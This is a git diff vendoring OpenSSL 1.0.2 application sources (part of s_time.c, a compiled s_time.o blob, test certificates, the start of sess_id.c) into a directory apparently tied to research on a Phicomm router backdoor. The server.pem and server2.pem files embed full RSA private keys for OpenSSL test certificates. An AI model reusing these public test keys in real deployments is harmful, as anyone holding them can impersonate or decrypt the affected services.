+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
+
+/*-
+ * doConnection - make a connection
+ * Args:
+ *              scon    = earlier ssl connection for session id, or NULL
+ * Returns:
+ *              SSL *   = the connection pointer.
+ */
+static SSL *doConnection(SSL *scon)
+{
+    BIO *conn;
+    SSL *serverCon;
+    int width, i;
+    fd_set readfds;
+
+    if ((conn = BIO_new(BIO_s_connect())) == NULL)
+        return (NULL);
+
+/*      BIO_set_conn_port(conn,port);*/
+    BIO_set_conn_hostname(conn, host);
+
+    if (scon == NULL)
+        serverCon = SSL_new(tm_ctx);
+    else {
+        serverCon = scon;
+        SSL_set_connect_state(serverCon);
+    }
+
+    SSL_set_bio(serverCon, conn, conn);
+
+#if 0
+    if (scon != NULL)
+        SSL_set_session(serverCon, SSL_get_session(scon));
+#endif
+
+    /* ok, lets connect */
+    for (;;) {
+        i = SSL_connect(serverCon);
+        if (BIO_sock_should_retry(i)) {
+            BIO_printf(bio_err, "DELAY\n");
+
+            i = SSL_get_fd(serverCon);
+            width = i + 1;
+            FD_ZERO(&readfds);
+            openssl_fdset(i, &readfds);
+            /*
+             * Note: under VMS with SOCKETSHR the 2nd parameter is currently
+             * of type (int *) whereas under other systems it is (void *) if
+             * you don't have a cast it will choke the compiler: if you do
+             * have a cast then you can either go for (int *) or (void *).
+             */
+            select(width, (void *)&readfds, NULL, NULL, NULL);
+            continue;
+        }
+        break;
+    }
+    if (i <= 0) {
+        BIO_printf(bio_err, "ERROR\n");
+        if (verify_error != X509_V_OK)
+            BIO_printf(bio_err, "verify error:%s\n",
+                       X509_verify_cert_error_string(verify_error));
+        else
+            ERR_print_errors(bio_err);
+        if (scon == NULL)
+            SSL_free(serverCon);
+        return NULL;
+    }
+
+    return serverCon;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_time.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_time.o
new file mode 100644
index 0000000000000000000000000000000000000000..7bb791ba8681c7965b0eb536b183c762870f0626
GIT binary patch
literal 15680
zcmb`Ne{dYdmB(9_1!fH^K?0Zq!T@$`gLlzNIADW`){^WI2;10lFu|~_R<qLL)$V#{
z)<1F~Hdq4h83DzSBS}Fj2^B~xSH^#ERd=S&mcd|raD*S1#5t1iBmB|{&cP{+1BAWz
z?H}5wk>;qnqpNnO=hNSQ-TnGa&-CnWY42PzrKU!hR3oks)iXndXj#DWGTR~=M7@Zw
zj(4qIWtTs(Z+-83#Cz-=Q)kVgj9ng>xt)%&;dddo%LmkPaJYWJq898OCxORaq7u9O
z)SezX(TZ0}C)+y~p;Us7^8V53cKOwg^6#{%|FX;f-C2G|oelk?Y{#6J55&t)$&$fg
z?*?th9-0qxx-VnWeM6gS?4h=q)9muo_O{_^_JNjT(Af*#EgiN~`*y<<?Xh8d-@C`z
zFTW8xXrIuve_HG%X?}F5eenG)*H7Alos!)jta#_BPO9PPZrJ4~bWcW4<O8(_Unxy9
zookQ1Y41=j?6I4bPrW*2?biKpb!Yjt>u-p!jo<L(pX<N!ar_&4DsFv`CPvuXPMj%d
zPOABB?^)v}XNCob(8QHL+>5E$gTX5MLv@rT6LJv3J|IseDytGkJ};}vzXE%oCuM@F
zw3;iOs+|=(s=BE<BlDGK?QKs@YmdEeE7-B^`AW5BH8=Q5{atrVA>ZwAgq{uK@WJ8I
zjLNh113#x?dq+FPgdFS0W9YhyA119=Hc2Z+E<}wW1-v?P!la5z(A+}V+%3~Ohn#6@
zSmR=){DkU;4w#W2;L@4U)>*LhClpmX4u_1~GpYPk$oGwxkN$F^S*iQJPxr_~o%GxK
z@w$<3S1OeN=@Osxn#rW~120eN`DN(*RB3^{R{j9vw97J7kL<L|&)6TmU{{{87d>!}
z5cRj;4IAS;8XJ!PE7ew^K3bgE#S_)kLNmH*VzGtx2c%gxYigD{%WsWZy1CBs8@lrN
z7N@IN9a;a^N=08`rI2c}maNjEQku&HfyX-5N?Je%?<L{L!s8GM)pb(0rjc29#|gOj
z|DN9?uV!V~#3jaGT|xA?ycy<-J-E9vU2NTBQNQ)r<bte=H9D0_X|g7i;Fd9$?0>GT
z6y^p;8~7RB4c;&-TIs@Zep7QtjxBx3w9dSCR4xNG^#eyKB6R1>*lCfLor+c1+NHXg
zIvb;rE}_zzC$&x$E;v+w_xWTlR(bdFV|1C6pTe{bv`xkM<$ci}JXq@5gMhHhhvSv~
zs$Ti9Jnq4=V{WLLRZn9FV=wKQMhdCjTZ9b+%@AcqukRf4X3nsOq_6h~3-^G|@<&oi
zM|<1BN^JPZ&d%~tYS;egMSJL)iY(j>t-|u0EZ(&i*X{T08tI|Y-%}0Mq(?0+s-ez%
zXYFl9ULfBPt86<qrKSG914Ebp^#a1$*|H9wDr0Bl-#@EVqzCtsuhekruRR#69I0Qk
z?@0a0bmNwFkHqUQc&@Gd_O2;M>Kkx3-=QK&&C-$j8=uil$bNRDo}&r*zWvc(I?7M0
zf|S(LT0%zbxrcOc*fr)htwLZ*{lG(V9j{(FG=HBQHS<@ZXjiezqGzNa*Y~kG&6+ti
zp<@R7zsxDMLc<rf3aPQ)sgN=eR=vkb@yH>n(K*yJajw;46Wz+HbN%+@a}6ww4GwR4
zZ=@BIO(28;BU+!JNnz2t#f<C=iPnMb7_suF8a;a=G!CK5=&lTPYeYT{eSv`;`@F!e
zAGnDm)!?olSV8Ch03W%G;KTsdp}J<DFHjN2UqG~uHmMt&zNBn=3cWzNuo@$yGn8hu
zL2LC)kNz7TI`L>Y$wQ|_xUKxIdgzSb_$1Ach<KTP$4VA^Eu@ImpWI~SO8wnV(aNVS
z*Gc7bJ+9^DtyDgnbyA+ylk}4FtR5$wEM+}wR!=Ch!6|0ao3)LI<&}y#E1$Cp4%tXK
zMK6=iq>`RvNgcA8d~TkUFIq%~3SM6*0v+oGua?ea9dw}NI`ga*?N?jre6c@CYS%6G
zJJkL<$22ZSuyR%0`kXrREY!)kRwgHVDD@%f0rn-0WYShH?^$laNzpi*9;<t^<@Hh3
zd;#MKMOx#9q}Mk#de*_7OpzRxFK&h>TjR4`h^0~G?g$@^<YT&2rqD;;Qz>E<icZ=o
z7O8bzVBAs2CO2CfGt~a<e8I`NZdNPY*`biYZN9C&Gk#r2w69#bd}T=JsUlnX;=);O
zNM!S=WVSEwdJ8YUxVc$GXu5OMX%Q(p<ZltlIU9wZU{hJn7@S9QPZen51g1b}PvD5b
zP>~!2+33#XMP%bfvP56naWtcOE1S>tl8x?Cud4!4lyd8G`Hd7m(z_PASaOrS&O*yg
z$Vk1MeCJ+)hE-23+4(}A!Y9J=GGOIU5IS>AxT4qYT&j&ejZJmLT3N~|H|FxWNH;lU
zT_)FSbu1SVa%mG2URiQIM5487Rp*8#S=<~{Ozy<USaFxWG^nygMRZN|Q}ATEGuezs
z4kTxfiD@*lEjefu=<!m_k+0<J7%f*;RhFJXxV%6flxiBO;}tW`2FIEWINM4W^ZgXi
zj^$=NM^MKStsN`u_LX8;-cq@0?1x0FS_I%6){^VdAY3n#a&c`^T$ptuB$l>!k;g5&
zt82wYv1sE-p_4))6e2~ny1WW!MVr#@Wfl&+=pu4;5!U9>b>}%Q4Jz4V&B{{bO=2V4
zgYv9teIA6oUI7b|3L9Ly)RATRjTU(r<B?a9>$olzSs7TOwxeQoF4?WtpI*lsSDQvn
zYg?`tt0+rLTU!@eb5?hka$d<=5N(b&Mq-zg<Z0|XO^wmUi{~n=>d+G-w)g^%HcOYS
z7WA|+42CC1q%W(3sQK1PQM0L`=FAh1pN380rNqzDWrKLSS{!Z|nzA@N<IdW6*t&gc
zJUnMx-Id|tn%Z?W;W=$#D;}OflEvX^bXz9*8eMl|h%!sU4R@jLQ0?NdbtmfHUKbBH
zZaZ#ic$d`~-qq3(exaqdH56`a3(q0*BsI3QnF$AUX{z|3GNFJ#?WAw0z|E+~*QzB;
zlcieeweckw&J<=}`i9u)^r;cF<I;)TAQOC8L-s9oDhxkgbNC9$@QWx9eG4EZ!xvH>
z9P@%?c%1U!jgnS5?1Inn@s*O-ir>M3l+4J#NqOjJNLsa%)*LZ}WZGR%dFai#IeuGn
zW7ix9G^c}1hTlnNHEdo?zaXk*{*;yUSFJdKpN{2g1!iYrsuj~G!22bU5B%fG9?<;w
zaa4#OYaaIThc%~{3FFc)G>?v>LhRD~5+DC3&9CtB-I}-h_+HJg^6~weCw%;%=8lj5
zQuCXA{8yS|cgWK#@}y3Di$lu4uK8^~{*LC`ef)jRvFYUL&+?>BJj5a8|DyTNeOxU7
zb>dMUuaogzC!X-}>6#z%@sl+_O&+U-r)&OoA3t038+{zRcC5Cy`1oASf8pa7Y5pr8
zpRYL<Y@RODJnG|d%@_FiQq7n7_|=+k@$prf|Gkf2r}=MvJfZnnzNOXCyv4`YY5q+g
z#~5qJR+H+8@z&6+Jyj~i9Rd8i0sO%L{%`=_8Nl}k@D~C&*0ag_e<Xl^9Kh?y?~~bS
z2;ip&@R<R8aR6Txz}E)we&VOlif-<U^8QZ~w>dz+HGtzK{AA<3H-JA9z#j|Xj|cGK
z0RCbC|2vA~$@=+Oz&!pwz|OG%UKe2h>;OJ5fVT$lWB|V{fR_XK-2wc*0RB(_KOEqP
z#{%@b1Nf5x{DlDip8@=j0sL?PKN`S44dAu(AT(M02(=%LrbJJ^b!<-|up1R#e<I~=
z5?%tE<AmG{dkNYitE_rqAoMO7TD4E6H!ofEE=C(p^gCW3<!SqtzzYT;_df~je}wBL
z<d&KCGk6ywO8stcG&X<!r3*x~v$YXlF?==Qs~KMx<7+;?zJ{+$@O3G^WQ~}rBJ0Ft
zrI@T0lhtCfUQAYu$(k`)H74se$+}IdJz2L&)@_n?n`GT4S+_~nZIX4HWZh<2w^`P0
zR-Ki#nq{qKS*uyrYQ9t?mUb>*9PdmlU$SIXdsm_>zPPhJAr^NmPq+!asgq}TV*#4-
zidngz1;D=6b!bA=OeL^mRl8kKyq|!An{nwKK*H_Im$E(Nbg#HskSakhPNeZdF_ZJs
zvJ!0z6KR?g2XDvpI}+&fMX_dn<AQ{G<)T7CVrraf_u`dILfTPkS6WLK9Y-Y4KWaYJ
zw=R)RX0l@;k<8?To9WFZ33)xHGc>?Nx`65%nwk@-Y{toXGJNtqra$tX4b>^8`U@iI
z<ukIeY^J-IEN)I@av4v8)~+=P<1Xakob{y)eY<@nuZLdDjLF8_Yji4#6Ipr@K+e#y
z?|P-Qa#J>+>`?>N<5%NFZCRw<g!fT+uU0LEE&ck&_!8HHE6DLqZi7e{N}en5nnWZE
zg@i|&dCw_sAQzcQAM1N6o2PeLa;6a+GInxoDmNC*I}mx9K}g-g3jw%0U-D#QDUnWR
zOK#toE99Kb)DJ({H^u4mDZM#Hn#cHJ#xK{LmQ#UWFN}Vf=CISsIQD-?(4!3dRwT2J
z0BfU<v6Dw3CGd9o7=8;NCGaKmG2A@ogD+)V?ZcGbX8b3VM?!x(=ws}d=YQ}s7~e&C
zB-p=_K1Tn~fRw<oS2Fx4ASLil`WTKMj*<NBs(pjve?#R)e~Q-o+dYHXxti(EV|vVm
zv7`0}6WeWMcFtt_h0G2gZ!6Ptzu8Q`oY`5;_zK1gj9<ezo^z2f-c|H5{r`>T@Ec;s
z@INq){(Pdsw(>UPu+>5zqz@S9aeIt$=*@eOS~N%r2k=ImPzw9_9EHUhK5l7#KI3$&
z7XP8!Gy5!K-@G3&`z*uFJ-m(CL4VA9k>x(Fn-$mjxba)c$LUvKnecNV5)NJTG5U>~
zqs`Tfe~0OLJZxk7Z!o>t_n{cJ%=^IynVoBioBrUr8wm%*x#9BXO3m?0x9R88S`XW6
z7{_xl5)ORcM;OQN4aUv~0d_uNdbDBsGaZvk3B~8o$JqIj=KlWR`5Fm&ZYRRHMP<g$
z`~W-47{89`S2H_&Ue+>xF4Olg4*#2W*D?Ei9oWe9=P~^jrsw|u2d2k(+vtPzFyrUb
zxoLN2fSsq99(K%q=y}FxGCRKxu=76C!_LL@LBjJj66R$VeN2Bo3$Sx4DpNA^XzrKi
zGX7O6H+JS~jsy2k3)3SzlRikDjL)WXW2Z}V9Jrkn(_>9C`gH;NGSee_B7Kk^VVuX$
zPR8ew&e(rka~yb_>}UE5nEpAY=l%aR(<5u_|B>+v86OR>GgZHOMKQlFLYiZ~Fr|m|
zI(!=Ae7qLpm|N4I2(!<}+rso{+uV;jeB7)X*D^bJMl$wq^y$qynPU3unf_*<-aKF3
z#(0G3?_hS;GJY4+^ZV>~8OJ+k)6WN(of{Z`i0Ln4{AWzh+kKSjagR0j9}Cbw&h#;+
z9}du)zaC)To0$H&0R79%KK?>v`g15i|0>gCEiw8x1N5UzKcDIU6rlf<=@GZae(iB|
zLJ6_P{eKGMH&U6=&(PegSNgVJInT#U{4_H=cvd%d@aI1yV`rv16>%Roc9t+ZH<8xZ
zx!R|{T-)jL@ixt`_i<zYCT2g$?DsR?&A8{YW7hw_^>MSF-{#|{-8-256tjOX)ARM@
zex~Qo$v<Lx%%!paQ>O1>_ILU8=TjNdZpObx=f=-_nH`7mr<oq@&ZH00ON@8Xxv}$G
z#_=1I;eTNE(~Q5#^ssN%!w(qe>+mtgFJ*S7=pW2rgU9)F%}pFqu}oiP`d%WYpJy^X
zZ}$SG?_>HH<J?Xcvx7dF`(}peGtAC<#`!++7RGO8`a#CI{!Yf%G5v##XBqz&&EcN~
zj6cKl{fxiGc#iQ88OPq-`13fu0WtoEFOV8E$9aK1M*nrD$8Wrbw=q3_6Eys)0R0N4
zcbR?-<0}}?GTz7dR>pf7zh86zxPHj^LZ*L&+2QfIlj-3L<DX%s=j|R~dLEy@Vf-@I
z?(57BZ}%OhN1Nul`;c+0wZ_jMGdpV;Z#aQYD8UbW9XOrwMO0?&oTWM1<m<p3rbn5%
zUKTNZhS_OnoX7t)jPvW|I>x#FCdT>o(#tsae@=6Zm;1lOIDSJn<GqF1;eOk}^k&Yf
znz)bY`<R`dGCjXeA7grcoxaF8zfNCgoL{F?LTJ5uzc&6qU32s?LmxA)a~S9TypZvm
znZB8Eu3yMF_y1Ll^Y!W`&EbE(J~&Lz*N1F?em&Fk^<fj^eBSS6cDVn4%=Fy<dl={b
zf1Yvf|5urP_}aw82-EX*GBTY+TF2w0MRWhUw3KnaF0E#E`1-Jx>3M&0OwavOVtRgE
z3^LBwrMsCO-tG^X9_^avoS!khN8H5Wqdxr%IEB))OwZT(w;1Q|6;&<#7fAhA4ew}>
zEcvaj3;5I|T+2vc_?X|DMbzEg?<KqG=oQtm&*X|uHW~GtO`eG2U&bQZ?Ybgb%;N;|
zSd@M$k|Iec7nT2C6;b*lWk3DuA)@qOT_;Naql?I2Q1p3kt`sd4=?}6+`j@3L;PfTZ
z#U%Y^@c&H~8GujpW7n9u7M=T4`_mLa%M;!iV;);Lr2O`C6?pA5bv%g<sH<-?WB&vD
zs^*9(o?7$*^_s6ii;E~fk3O*JuWyBw5V66NY2PsH9nl2#gglx0DW74}9dm4_O33?U
zV*AO;n!i2&c?-!V^IsnxekqxFhyO4~roQ2L7mM~A>BG}Ky8R0|q`c|3Ibv^U@?843
zuFo0rel6C%<LSe%9q5L2eG4Znnf@DeJ7r+gU;i~-|3^lskN*0%5}(X}Tebg;U*JE4
zvZ-(UH(A?gYU?TZruVygeMUI7(8pgNw_E?*6B3)w#y33&qjN0z{fA*rR)3f7|2?cO
Ivi|!21E(a_QUCw|

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.pem
new file mode 100644
index 0000000..d0fc265
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.pem
@@ -0,0 +1,52 @@
+subject= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = Test Server Cert
+issuer= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = OpenSSL Test Intermediate CA
+-----BEGIN CERTIFICATE-----
+MIID5zCCAs+gAwIBAgIJALnu1NlVpZ6zMA0GCSqGSIb3DQEBBQUAMHAxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMSIwIAYDVQQLDBlGT1IgVEVT
+VElORyBQVVJQT1NFUyBPTkxZMSUwIwYDVQQDDBxPcGVuU1NMIFRlc3QgSW50ZXJt
+ZWRpYXRlIENBMB4XDTExMTIwODE0MDE0OFoXDTIxMTAxNjE0MDE0OFowZDELMAkG
+A1UEBhMCVUsxFjAUBgNVBAoMDU9wZW5TU0wgR3JvdXAxIjAgBgNVBAsMGUZPUiBU
+RVNUSU5HIFBVUlBPU0VTIE9OTFkxGTAXBgNVBAMMEFRlc3QgU2VydmVyIENlcnQw
+ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDzhPOSNtyyRspmeuUpxfNJ
+KCLTuf7g3uQ4zu4iHOmRO5TQci+HhVlLZrHF9XqFXcIP0y4pWDbMSGuiorUmzmfi
+R7bfSdI/+qIQt8KXRH6HNG1t8ou0VSvWId5TS5Dq/er5ODUr9OaaDva7EquHIcMv
+vPQGuI+OEAcnleVCy9HVEIySrO4P3CNIicnGkwwiAud05yUAq/gPXBC1hTtmlPD7
+TVcGVSEiJdvzqqlgv02qedGrkki6GY4S7GjZxrrf7Foc2EP+51LJzwLQx3/JfrCU
+41NEWAsu/Sl0tQabXESN+zJ1pDqoZ3uHMgpQjeGiE0olr+YcsSW/tJmiU9OiAr8R
+AgMBAAGjgY8wgYwwDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwLAYJYIZI
+AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBSCvM8AABPR9zklmifnr9LvIBturDAfBgNVHSMEGDAWgBQ2w2yI55X+sL3szj49
+hqshgYfa2jANBgkqhkiG9w0BAQUFAAOCAQEAqb1NV0B0/pbpK9Z4/bNjzPQLTRLK
+WnSNm/Jh5v0GEUOE/Beg7GNjNrmeNmqxAlpqWz9qoeoFZax+QBpIZYjROU3TS3fp
+yLsrnlr0CDQ5R7kCCDGa8dkXxemmpZZLbUCpW2Uoy8sAA4JjN9OtsZY7dvUXFgJ7
+vVNTRnI01ghknbtD+2SxSQd3CWF6QhcRMAzZJ1z1cbbwGDDzfvGFPzJ+Sq+zEPds
+xoVLLSetCiBc+40ZcDS5dV98h9XD7JMTQfxzA7mNGv73JoZJA6nFgj+ADSlJsY/t
+JBv+z1iQRueoh9Qeee+ZbRifPouCB8FDx+AltvHTANdAq0t/K3o+pplMVA==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEA84TzkjbcskbKZnrlKcXzSSgi07n+4N7kOM7uIhzpkTuU0HIv
+h4VZS2axxfV6hV3CD9MuKVg2zEhroqK1Js5n4ke230nSP/qiELfCl0R+hzRtbfKL
+tFUr1iHeU0uQ6v3q+Tg1K/Tmmg72uxKrhyHDL7z0BriPjhAHJ5XlQsvR1RCMkqzu
+D9wjSInJxpMMIgLndOclAKv4D1wQtYU7ZpTw+01XBlUhIiXb86qpYL9NqnnRq5JI
+uhmOEuxo2ca63+xaHNhD/udSyc8C0Md/yX6wlONTRFgLLv0pdLUGm1xEjfsydaQ6
+qGd7hzIKUI3hohNKJa/mHLElv7SZolPTogK/EQIDAQABAoIBAADq9FwNtuE5IRQn
+zGtO4q7Y5uCzZ8GDNYr9RKp+P2cbuWDbvVAecYq2NV9QoIiWJOAYZKklOvekIju3
+r0UZLA0PRiIrTg6NrESx3JrjWDK8QNlUO7CPTZ39/K+FrmMkV9lem9yxjJjyC34D
+AQB+YRTx+l14HppjdxNwHjAVQpIx/uO2F5xAMuk32+3K+pq9CZUtrofe1q4Agj9R
+5s8mSy9pbRo9kW9wl5xdEotz1LivFOEiqPUJTUq5J5PeMKao3vdK726XI4Z455Nm
+W2/MA0YV0ug2FYinHcZdvKM6dimH8GLfa3X8xKRfzjGjTiMSwsdjgMa4awY3tEHH
+674jhAECgYEA/zqMrc0zsbNk83sjgaYIug5kzEpN4ic020rSZsmQxSCerJTgNhmg
+utKSCt0Re09Jt3LqG48msahX8ycqDsHNvlEGPQSbMu9IYeO3Wr3fAm75GEtFWePY
+BhM73I7gkRt4s8bUiUepMG/wY45c5tRF23xi8foReHFFe9MDzh8fJFECgYEA9EFX
+4qAik1pOJGNei9BMwmx0I0gfVEIgu0tzeVqT45vcxbxr7RkTEaDoAG6PlbWP6D9a
+WQNLp4gsgRM90ZXOJ4up5DsAWDluvaF4/omabMA+MJJ5kGZ0gCj5rbZbKqUws7x8
+bp+6iBfUPJUbcqNqFmi/08Yt7vrDnMnyMw2A/sECgYEAiiuRMxnuzVm34hQcsbhH
+6ymVqf7j0PW2qK0F4H1ocT9qhzWFd+RB3kHWrCjnqODQoI6GbGr/4JepHUpre1ex
+4UEN5oSS3G0ru0rC3U4C59dZ5KwDHFm7ffZ1pr52ljfQDUsrjjIMRtuiwNK2OoRa
+WSsqiaL+SDzSB+nBmpnAizECgYBdt/y6rerWUx4MhDwwtTnel7JwHyo2MDFS6/5g
+n8qC2Lj6/fMDRE22w+CA2esp7EJNQJGv+b27iFpbJEDh+/Lf5YzIT4MwVskQ5bYB
+JFcmRxUVmf4e09D7o705U/DjCgMH09iCsbLmqQ38ONIRSHZaJtMDtNTHD1yi+jF+
+OT43gQKBgQC/2OHZoko6iRlNOAQ/tMVFNq7fL81GivoQ9F1U0Qr+DH3ZfaH8eIkX
+xT0ToMPJUzWAn8pZv0snA0um6SIgvkCuxO84OkANCVbttzXImIsL7pFzfcwV/ERK
+UM6j0ZuSMFOCr/lGPAoOQU0fskidGEHi1/kW+suSr28TqsyYZpwBDQ==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.srl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.srl
new file mode 100644
index 0000000..8a0f05e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server.srl
@@ -0,0 +1 @@
+01
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server2.pem
new file mode 100644
index 0000000..a3927cf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/server2.pem
@@ -0,0 +1,52 @@
+subject= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = Test Server Cert #2
+issuer= C = UK, O = OpenSSL Group, OU = FOR TESTING PURPOSES ONLY, CN = OpenSSL Test Intermediate CA
+-----BEGIN CERTIFICATE-----
+MIID6jCCAtKgAwIBAgIJALnu1NlVpZ60MA0GCSqGSIb3DQEBBQUAMHAxCzAJBgNV
+BAYTAlVLMRYwFAYDVQQKDA1PcGVuU1NMIEdyb3VwMSIwIAYDVQQLDBlGT1IgVEVT
+VElORyBQVVJQT1NFUyBPTkxZMSUwIwYDVQQDDBxPcGVuU1NMIFRlc3QgSW50ZXJt
+ZWRpYXRlIENBMB4XDTExMTIwODE0MDE0OFoXDTIxMTAxNjE0MDE0OFowZzELMAkG
+A1UEBhMCVUsxFjAUBgNVBAoMDU9wZW5TU0wgR3JvdXAxIjAgBgNVBAsMGUZPUiBU
+RVNUSU5HIFBVUlBPU0VTIE9OTFkxHDAaBgNVBAMME1Rlc3QgU2VydmVyIENlcnQg
+IzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDrdi7j9yctG+L4EjBy
+gjPmEqZzOJEQba26MoQGzglU7e5Xf59Rb/hgVQuKAoiZe7/R8rK4zJ4W7iXdXw0L
+qBpyG8B5aGKeI32w+A9TcBApoXXL2CrYQEQjZwUIpLlYBIi2NkJj3nVkq5dgl1gO
+ALiQ+W8jg3kzg5Ec9rimp9r93N8wsSL3awsafurmYCvOf7leHaMP1WJ/zDRGUNHG
+/WtDjXc8ZUG1+6EXU9Jc2Fs+2Omf7fcN0l00AK/wPg8OaNS0rKyGq9JdIT9FRGV1
+bXe/rx58FaE5CItdwCSYhJvF/O95LWQoxJXye5bCFLmvDTEyVq9FMSCptfsmbXjE
+ZGsXAgMBAAGjgY8wgYwwDAYDVR0TAQH/BAIwADAOBgNVHQ8BAf8EBAMCBeAwLAYJ
+YIZIAYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1Ud
+DgQWBBR52UaWWTKzZGDH/X4mWNcuqeQVazAfBgNVHSMEGDAWgBQ2w2yI55X+sL3s
+zj49hqshgYfa2jANBgkqhkiG9w0BAQUFAAOCAQEANBW+XYLlHBqVY/31ie+3gRlS
+LPfy4SIqn0t3RJjagT29MXprblBO2cbMO8VGjkQdKGpmMXjxbht2arOOUXRHX4n/
+XTyn/QHEf0bcwIITMReO3DZUPAEw8hSjn9xEOM0IRVOCP+mH5fi74QzzQaZVCyYg
+5VtLKdww/+sc0nCbKl2KWgDluriH0nfVx95qgW3mg9dhXRr0zmf1w2zkBHYpARYL
+Dew6Z8EE4tS3HJu8/qM6meWzNtrfonQ3eiiMxjZBxzV46jchBwa2z9XYhP6AmpPb
+oeTSzcQNbWsxaGYzWo46oLDUZmJOwSBawbS31bZNMCoPIY6ukoesCzFSsUKZww==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIIEowIBAAKCAQEA63Yu4/cnLRvi+BIwcoIz5hKmcziREG2tujKEBs4JVO3uV3+f
+UW/4YFULigKImXu/0fKyuMyeFu4l3V8NC6gachvAeWhiniN9sPgPU3AQKaF1y9gq
+2EBEI2cFCKS5WASItjZCY951ZKuXYJdYDgC4kPlvI4N5M4ORHPa4pqfa/dzfMLEi
+92sLGn7q5mArzn+5Xh2jD9Vif8w0RlDRxv1rQ413PGVBtfuhF1PSXNhbPtjpn+33
+DdJdNACv8D4PDmjUtKyshqvSXSE/RURldW13v68efBWhOQiLXcAkmISbxfzveS1k
+KMSV8nuWwhS5rw0xMlavRTEgqbX7Jm14xGRrFwIDAQABAoIBAHLsTPihIfLnYIE5
+x4GsQQ5zXeBw5ITDM37ktwHnQDC+rIzyUl1aLD1AZRBoKinXd4lOTqLZ4/NHKx4A
+DYr58mZtWyUmqLOMmQVuHXTZBlp7XtYuXMMNovQwjQlp9LicBeoBU6gQ5PVMtubD
+F4xGF89Sn0cTHW3iMkqTtQ5KcR1j57OcJO0FEb1vPvk2MXI5ZyAatUYE7YacbEzd
+rg02uIwx3FqNSkuSI79uz4hMdV5TPtuhxx9nTwj9aLUhXFeZ0mn2PVgVzEnnMoJb
++znlsZDgzDlJqdaD744YGWh8Z3OEssB35KfzFcdOeO6yH8lmv2Zfznk7pNPT7LTb
+Lae9VgkCgYEA92p1qnAB3NtJtNcaW53i0S5WJgS1hxWKvUDx3lTB9s8X9fHpqL1a
+E94fDfWzp/hax6FefUKIvBOukPLQ6bYjTMiFoOHzVirghAIuIUoMI5VtLhwD1hKs
+Lr7l/dptMgKb1nZHyXoKHRBthsy3K4+udsPi8TzMvYElgEqyQIe/Rk0CgYEA86GL
+8HC6zLszzKERDPBxrboRmoFvVUCTQDhsfj1M8aR3nQ8V5LkdIJc7Wqm/Ggfk9QRf
+rJ8M2WUMlU5CNnCn/KCrKzCNZIReze3fV+HnKdbcXGLvgbHPrhnz8yYehUFG+RGq
+bVyDWRU94T38izy2s5qMYrMJWZEYyXncSPbfcPMCgYAtaXfxcZ+V5xYPQFARMtiX
+5nZfggvDoJuXgx0h3tK/N2HBfcaSdzbaYLG4gTmZggc/jwnl2dl5E++9oSPhUdIG
+3ONSFUbxsOsGr9PBvnKd8WZZyUCXAVRjPBzAzF+whzQNWCZy/5htnz9LN7YDI9s0
+5113Q96cheDZPFydZY0hHQKBgQDVbEhNukM5xCiNcu+f2SaMnLp9EjQ4h5g3IvaP
+5B16daw/Dw8LzcohWboqIxeAsze0GD/D1ZUJAEd0qBjC3g+a9BjefervCjKOzXng
+38mEUm+6EwVjJSQcjSmycEs+Sr/kwr/8i5WYvU32+jk4tFgMoC+o6tQe/Uesf68k
+z/dPVwKBgGbF7Vv1/3SmhlOy+zYyvJ0CrWtKxH9QP6tLIEgEpd8x7YTSuCH94yok
+kToMXYA3sWNPt22GbRDZ+rcp4c7HkDx6I6vpdP9aQEwJTp0EPy0sgWr2XwYmreIQ
+NFmkk8Itn9EY2R9VBaP7GLv5kvwxDdLAnmwGmzVtbmaVdxCaBwUk
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/sess_id.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/sess_id.c
new file mode 100644
index 0000000..7773abe
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/sess_id.c
@@ -0,0 +1,300 @@
+/* apps/sess_id.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
